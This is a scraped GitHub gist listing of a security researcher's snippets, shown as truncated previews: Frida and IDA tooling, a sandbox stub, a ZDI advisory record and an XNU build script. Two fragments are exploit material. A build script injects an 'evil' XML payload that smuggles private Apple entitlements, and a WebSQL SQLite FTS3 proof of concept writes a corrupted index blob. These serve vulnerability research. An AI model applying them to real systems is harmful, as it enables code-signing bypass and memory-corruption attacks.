Recursively scan all executables (PE, ELF and MachO!) in a folder and generate IDA databases in parallel
node batch.js [path]
codecolorist ChiChou
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // frida -U --attach-frontmost -l awake.js | |
| ObjC.schedule(ObjC.mainQueue, () => { | |
| try { | |
| ObjC.classes.UIApplication.sharedApplication().setIdleTimerDisabled_(ptr(1)) | |
| } finally { | |
| } | |
| }) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import asyncio | |
| import concurrent.futures | |
| import frida | |
| pool = concurrent.futures.ThreadPoolExecutor(max_workers=4) | |
| def make_handler(dev: frida.core.Device, port:int, buffer_size=4096): | |
| async def handler(reader, writer): |
ChiChou
/ ctree_rename.py
Last active
June 27, 2020 07:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import idc | |
| import idautils | |
| import idaapi | |
| import ida_funcs | |
| import ida_name | |
| import ida_bytes | |
| import ida_nalt | |
| import ida_hexrays as hr |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| # preinstalled python is python2 | |
| filename = '/'.join(map(os.environ.get, ('TARGET_TEMP_DIR', 'FULL_PRODUCT_NAME'))) + '.xcent' | |
| evil = ''' | |
| <!---><!--> | |
| <key>platform-application</key> | |
| <true/> | |
| <key>com.apple.private.security.no-container</key> | |
| <true/> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "idYear": "11", | |
| "idBase": 249, | |
| "zdiId": "ZDI-11-249", | |
| "zdiCan": "ZDI-CAN-1159", | |
| "affectedVendors": "Microsoft", | |
| "cve": "CVE-2011-1347", | |
| "publishDate": "2011-08-09", | |
| "lastUpdate": "", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #import <Foundation/Foundation.h> | |
| #include <sandbox.h> | |
| int sandbox_init_with_parameters(const char* profile, | |
| uint64_t flags, | |
| const char* const parameters[], | |
| char** errorbuf); | |
| #define SANDBOX_PROFILE "/System/Library/Frameworks/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb" | |
| #define SANDBOX_NAMED_EXTERNAL 0x0003 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (() => { | |
| const trs = document.querySelector('table').querySelectorAll('tr') | |
| const rows = [].slice.call(trs, 3, trs.length - 1) | |
| const footer = trs[trs.length - 1] | |
| const sorted = rows.sort((a, b) => { | |
| const parse = tr => tr.querySelector('td:nth-of-type(2) a').textContent | |
| .match(/((\d+\.?)+)\.tar\.gz/)[1] | |
| .split('.') | |
| .map(s => parseInt(s, 10)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const poc = `CREATE VIRTUAL TABLE ft USING fts3; | |
| INSERT INTO ft VALUES('aback'); | |
| INSERT INTO ft VALUES('abaft'); | |
| INSERT INTO ft VALUES('abandon'); | |
| UPDATE ft_segdir SET root = x'0005616261636B03010200FFFFFFFF070266740302020003046E646F6E03030200'; | |
| SELECT * FROM ft WHERE ft MATCH 'abandon';`; | |
| const name = 'db' + Math.random().toString().slice(2, 5); | |
| const db = openDatabase(name, '1.0', 'xx', 1024 * 16); |
ChiChou
/ build-xnu-4903.221.2.sh
Created
December 11, 2018 08:23
— forked from matteyeux/build-xnu-4903.221.2.sh
A script to build XNU version 4903.221.2 (macOS High Sierra 10.13). Initial script by Brandon Azad.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash | |
| # | |
| # build-xnu-4903.221.2.sh | |
| # Initial script by Brandon Azad (https://gist.github.com/bazad/654959120a423b226dc564073b435453) | |
| # Updated on 12/11/18 by matteyeux | |
| # | |
| # A script showing how to build XNU version 4570.1.46 on MacOS High Sierra | |
| # 10.13 with Xcode 9. | |
| # | |
| # Note: This process will OVERWRITE files in Xcode's MacOSX10.13.sdk. Make a |
NewerOlder